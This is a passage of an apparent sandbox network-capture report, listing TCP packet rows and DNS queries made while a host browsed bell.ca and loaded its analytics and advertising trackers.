                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:21.059390068 CET50060443192.168.2.918.184.216.10
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:21.061748028 CET50060443192.168.2.918.184.216.10
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:21.061759949 CET4435006018.184.216.10192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:21.088340044 CET44350038108.138.26.118192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:21.088423967 CET44350038108.138.26.118192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:21.089195013 CET44350035142.250.185.164192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:21.089241028 CET44350035142.250.185.164192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:21.089267015 CET44350035142.250.185.164192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:21.089283943 CET50035443192.168.2.9142.250.185.164
                                                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.296411037 CET192.168.2.91.1.1.10xfb05Standard query (0)mybell.bell.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.296653986 CET192.168.2.91.1.1.10x7f28Standard query (0)mybell.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.450635910 CET192.168.2.91.1.1.10x44adStandard query (0)www.bell.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.451191902 CET192.168.2.91.1.1.10xfcbdStandard query (0)www.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:55.215687037 CET192.168.2.91.1.1.10xcb47Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:55.215974092 CET192.168.2.91.1.1.10xa4d7Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:56.968943119 CET192.168.2.91.1.1.10xcb9eStandard query (0)mybell.bell.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:56.969326019 CET192.168.2.91.1.1.10x803dStandard query (0)mybell.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:56.971462965 CET192.168.2.91.1.1.10x3447Standard query (0)www.bell.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:56.971595049 CET192.168.2.91.1.1.10xdfe1Standard query (0)www.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.722812891 CET192.168.2.91.1.1.10x8524Standard query (0)assets.adobedtm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.723795891 CET192.168.2.91.1.1.10x8b2bStandard query (0)assets.adobedtm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.949769974 CET192.168.2.91.1.1.10x83a5Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.975446939 CET192.168.2.91.1.1.10xba03Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.931648970 CET192.168.2.91.1.1.10x840aStandard query (0)m.bell.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.932241917 CET192.168.2.91.1.1.10xdddcStandard query (0)m.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.299406052 CET192.168.2.91.1.1.10x177fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.299535036 CET192.168.2.91.1.1.10x55e3Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.568432093 CET192.168.2.91.1.1.10x67adStandard query (0)assets.adobedtm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.568770885 CET192.168.2.91.1.1.10x9bfeStandard query (0)assets.adobedtm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.659159899 CET192.168.2.91.1.1.10xce15Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.659308910 CET192.168.2.91.1.1.10xa9a2Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.782632113 CET192.168.2.91.1.1.10x76ccStandard query (0)bell.app.linkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.782783031 CET192.168.2.91.1.1.10x96ffStandard query (0)bell.app.link65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.033128023 CET192.168.2.91.1.1.10xe65fStandard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.033271074 CET192.168.2.91.1.1.10x2d98Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.052506924 CET192.168.2.91.1.1.10xa221Standard query (0)bellca.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.052644968 CET192.168.2.91.1.1.10x7046Standard query (0)bellca.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.104063034 CET192.168.2.91.1.1.10x4577Standard query (0)somni.bell.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.104243994 CET192.168.2.91.1.1.10x2c71Standard query (0)somni.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.190191031 CET192.168.2.91.1.1.10x1ea3Standard query (0)collection.decibelinsight.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.190320015 CET192.168.2.91.1.1.10x2d4cStandard query (0)collection.decibelinsight.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:11.529526949 CET192.168.2.91.1.1.10x7858Standard query (0)cdn.decibelinsight.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:11.530389071 CET192.168.2.91.1.1.10xc5cbStandard query (0)cdn.decibelinsight.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.329658985 CET192.168.2.91.1.1.10xc065Standard query (0)cm.everesttech.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.330085039 CET192.168.2.91.1.1.10xce2bStandard query (0)cm.everesttech.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.333688974 CET192.168.2.91.1.1.10x21d8Standard query (0)cdn.branch.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.334000111 CET192.168.2.91.1.1.10x36dfStandard query (0)cdn.branch.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.334830999 CET192.168.2.91.1.1.10x89efStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.335062981 CET192.168.2.91.1.1.10xa397Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.336165905 CET192.168.2.91.1.1.10x2973Standard query (0)somni.bell.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.336622000 CET192.168.2.91.1.1.10x9e4cStandard query (0)somni.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.342021942 CET192.168.2.91.1.1.10x7e1Standard query (0)collection.decibelinsight.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.342267990 CET192.168.2.91.1.1.10x160aStandard query (0)collection.decibelinsight.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.343832016 CET192.168.2.91.1.1.10x10deStandard query (0)support.bell.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.344032049 CET192.168.2.91.1.1.10x146dStandard query (0)support.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.565314054 CET192.168.2.91.1.1.10x9723Standard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.565715075 CET192.168.2.91.1.1.10x96bcStandard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.723370075 CET192.168.2.91.1.1.10x8a0dStandard query (0)cdn.decibelinsight.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.723860025 CET192.168.2.91.1.1.10x57Standard query (0)cdn.decibelinsight.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.852644920 CET192.168.2.91.1.1.10xf223Standard query (0)match.adsrvr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.853245020 CET192.168.2.91.1.1.10x4ddbStandard query (0)match.adsrvr.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.314855099 CET192.168.2.91.1.1.10x384bStandard query (0)app.linkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.315121889 CET192.168.2.91.1.1.10x6a1bStandard query (0)app.link65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.466578960 CET192.168.2.91.1.1.10x4497Standard query (0)cdn.branch.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.467859983 CET192.168.2.91.1.1.10xbffeStandard query (0)cdn.branch.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.433691025 CET192.168.2.91.1.1.10x8459Standard query (0)api2.branch.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.434627056 CET192.168.2.91.1.1.10xce6bStandard query (0)api2.branch.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.459481001 CET192.168.2.91.1.1.10xede9Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.459697008 CET192.168.2.91.1.1.10x6ba6Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.613363028 CET192.168.2.91.1.1.10xcbd5Standard query (0)app.linkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.613518000 CET192.168.2.91.1.1.10x7e89Standard query (0)app.link65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.407819986 CET192.168.2.91.1.1.10x156cStandard query (0)support.bell.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.407957077 CET192.168.2.91.1.1.10xca36Standard query (0)support.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.624061108 CET192.168.2.91.1.1.10xad49Standard query (0)ml314.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.624212980 CET192.168.2.91.1.1.10xbf7fStandard query (0)ml314.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.511707067 CET192.168.2.91.1.1.10xa836Standard query (0)s.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.511869907 CET192.168.2.91.1.1.10x5aacStandard query (0)s.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.682579041 CET192.168.2.91.1.1.10x4f8bStandard query (0)ps.eyeota.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.682825089 CET192.168.2.91.1.1.10x85c5Standard query (0)ps.eyeota.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.684642076 CET192.168.2.91.1.1.10x1ea3Standard query (0)cms.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.684849024 CET192.168.2.91.1.1.10x8457Standard query (0)cms.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.686959982 CET192.168.2.91.1.1.10x1ef0Standard query (0)ads.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.687342882 CET192.168.2.91.1.1.10x7055Standard query (0)ads.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.687868118 CET192.168.2.91.1.1.10x4edfStandard query (0)sync.crwdcntrl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.688014030 CET192.168.2.91.1.1.10x62b6Standard query (0)sync.crwdcntrl.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.831811905 CET192.168.2.91.1.1.10xa002Standard query (0)api2.branch.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.831928968 CET192.168.2.91.1.1.10x3609Standard query (0)api2.branch.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:20.808665037 CET192.168.2.91.1.1.10xd3aStandard query (0)ups.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:20.809042931 CET192.168.2.91.1.1.10x2b25Standard query (0)ups.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:22.373219013 CET192.168.2.91.1.1.10x8065Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:22.373436928 CET192.168.2.91.1.1.10x52cbStandard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:23.905808926 CET192.168.2.91.1.1.10x3903Standard query (0)resources.digital-cloud.medallia.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:23.906202078 CET192.168.2.91.1.1.10xbf75Standard query (0)resources.digital-cloud.medallia.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:25.074778080 CET192.168.2.91.1.1.10x553fStandard query (0)s.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:25.075527906 CET192.168.2.91.1.1.10x9754Standard query (0)s.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:25.953824043 CET192.168.2.91.1.1.10x9a28Standard query (0)c.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:25.954130888 CET192.168.2.91.1.1.10x8d06Standard query (0)c.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:26.779433012 CET192.168.2.91.1.1.10x4008Standard query (0)td.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:26.779609919 CET192.168.2.91.1.1.10x13d0Standard query (0)td.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:26.783251047 CET192.168.2.91.1.1.10x61dcStandard query (0)s.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:26.783404112 CET192.168.2.91.1.1.10x9f7fStandard query (0)s.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:27.488970995 CET192.168.2.91.1.1.10x81bcStandard query (0)analytics.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:27.489259958 CET192.168.2.91.1.1.10x4727Standard query (0)analytics.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:27.751087904 CET192.168.2.91.1.1.10xa442Standard query (0)resources.digital-cloud.medallia.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:27.751599073 CET192.168.2.91.1.1.10x5c3dStandard query (0)resources.digital-cloud.medallia.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:27.872611046 CET192.168.2.91.1.1.10x695aStandard query (0)analytics.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:27.872858047 CET192.168.2.91.1.1.10x6d56Standard query (0)analytics.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.137531996 CET192.168.2.91.1.1.10x3741Standard query (0)resources.digital-cloud.medallia.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.138046980 CET192.168.2.91.1.1.10xc64dStandard query (0)resources.digital-cloud.medallia.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.141074896 CET192.168.2.91.1.1.10x2c22Standard query (0)c.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.141212940 CET192.168.2.91.1.1.10x2b30Standard query (0)c.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.525513887 CET192.168.2.91.1.1.10x7a57Standard query (0)c.go-mpulse.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.525958061 CET192.168.2.91.1.1.10x387cStandard query (0)c.go-mpulse.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.658622026 CET192.168.2.91.1.1.10x92f9Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.658993959 CET192.168.2.91.1.1.10xdfe2Standard query (0)www.youtube.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.486154079 CET192.168.2.91.1.1.10x26e5Standard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.486284971 CET192.168.2.91.1.1.10x26ddStandard query (0)stats.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.487808943 CET192.168.2.91.1.1.10xfa03Standard query (0)data1.bell.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.487966061 CET192.168.2.91.1.1.10x9848Standard query (0)data1.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.488245010 CET192.168.2.91.1.1.10x5ab8Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.488360882 CET192.168.2.91.1.1.10xf90bStandard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.696546078 CET192.168.2.91.1.1.10x84d7Standard query (0)analytics-fe.digital-cloud.medallia.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.696841955 CET192.168.2.91.1.1.10xc194Standard query (0)analytics-fe.digital-cloud.medallia.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:35.742702961 CET192.168.2.91.1.1.10xa3d4Standard query (0)udc-neb.kampyle.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:35.742702961 CET192.168.2.91.1.1.10xabcfStandard query (0)udc-neb.kampyle.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.545145035 CET192.168.2.91.1.1.10x7f9eStandard query (0)02179915.akstat.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.545305967 CET192.168.2.91.1.1.10x262cStandard query (0)02179915.akstat.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.696455956 CET192.168.2.91.1.1.10xfea7Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.696772099 CET192.168.2.91.1.1.10x4be9Standard query (0)www.youtube.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.075545073 CET192.168.2.91.1.1.10x2c79Standard query (0)s.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.075949907 CET192.168.2.91.1.1.10xb377Standard query (0)s.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.113351107 CET192.168.2.91.1.1.10x5718Standard query (0)data1.bell.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.115346909 CET192.168.2.91.1.1.10x9060Standard query (0)data1.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.172354937 CET192.168.2.91.1.1.10x8230Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.172627926 CET192.168.2.91.1.1.10x964Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.175096989 CET192.168.2.91.1.1.10xa437Standard query (0)analytics-fe.digital-cloud.medallia.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.175326109 CET192.168.2.91.1.1.10xc22eStandard query (0)analytics-fe.digital-cloud.medallia.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:50.985411882 CET192.168.2.91.1.1.10x9d38Standard query (0)trial-eum-clientnsv4-s.akamaihd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:50.985569000 CET192.168.2.91.1.1.10xee92Standard query (0)trial-eum-clientnsv4-s.akamaihd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:51.092668056 CET192.168.2.91.1.1.10x541Standard query (0)trial-eum-clienttons-s.akamaihd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:51.093008041 CET192.168.2.91.1.1.10x53f4Standard query (0)trial-eum-clienttons-s.akamaihd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:52.420603037 CET192.168.2.91.1.1.10xc3e7Standard query (0)vx7putk7mu3ggzzdqjka-pib559-61906c0f2-clientnsv4-s.akamaihd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:52.420763969 CET192.168.2.91.1.1.10xaac3Standard query (0)vx7putk7mu3ggzzdqjka-pib559-61906c0f2-clientnsv4-s.akamaihd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:52.466327906 CET192.168.2.91.1.1.10x8544Standard query (0)173-254-250-77_s-2-16-164-104_ts-1730380372-clienttons-s.akamaihd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:52.466506004 CET192.168.2.91.1.1.10x5869Standard query (0)173-254-250-77_s-2-16-164-104_ts-1730380372-clienttons-s.akamaihd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.338318110 CET192.168.2.91.1.1.10x7612Standard query (0)udc-neb.kampyle.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.338464975 CET192.168.2.91.1.1.10x7495Standard query (0)udc-neb.kampyle.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.760669947 CET192.168.2.91.1.1.10x922dStandard query (0)siteimproveanalytics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.761040926 CET192.168.2.91.1.1.10xa4dcStandard query (0)siteimproveanalytics.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.761996984 CET192.168.2.91.1.1.10xc437Standard query (0)static.ads-twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.762193918 CET192.168.2.91.1.1.10x9a19Standard query (0)static.ads-twitter.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.886166096 CET192.168.2.91.1.1.10x3b41Standard query (0)analytics.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.886542082 CET192.168.2.91.1.1.10xa19bStandard query (0)analytics.tiktok.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.887826920 CET192.168.2.91.1.1.10xd172Standard query (0)sc-static.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.888048887 CET192.168.2.91.1.1.10x7305Standard query (0)sc-static.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:54.797755957 CET192.168.2.91.1.1.10x36cdStandard query (0)snap.licdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:54.798222065 CET192.168.2.91.1.1.10x3f22Standard query (0)snap.licdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:55.296003103 CET192.168.2.91.1.1.10xb817Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:55.296164989 CET192.168.2.91.1.1.10xff9Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:55.437916994 CET192.168.2.91.1.1.10xced3Standard query (0)mybell.bell.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:55.438148975 CET192.168.2.91.1.1.10xa3e7Standard query (0)mybell.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:00.438724041 CET192.168.2.91.1.1.10x6423Standard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:00.439143896 CET192.168.2.91.1.1.10xa7eStandard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:03.855185032 CET192.168.2.91.1.1.10x789fStandard query (0)www.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:03.855515003 CET192.168.2.91.1.1.10xe23cStandard query (0)www.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:04.957906008 CET192.168.2.91.1.1.10x8651Standard query (0)www.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:04.958040953 CET192.168.2.91.1.1.10xb2adStandard query (0)www.linkedin.com65IN (0x0001)false
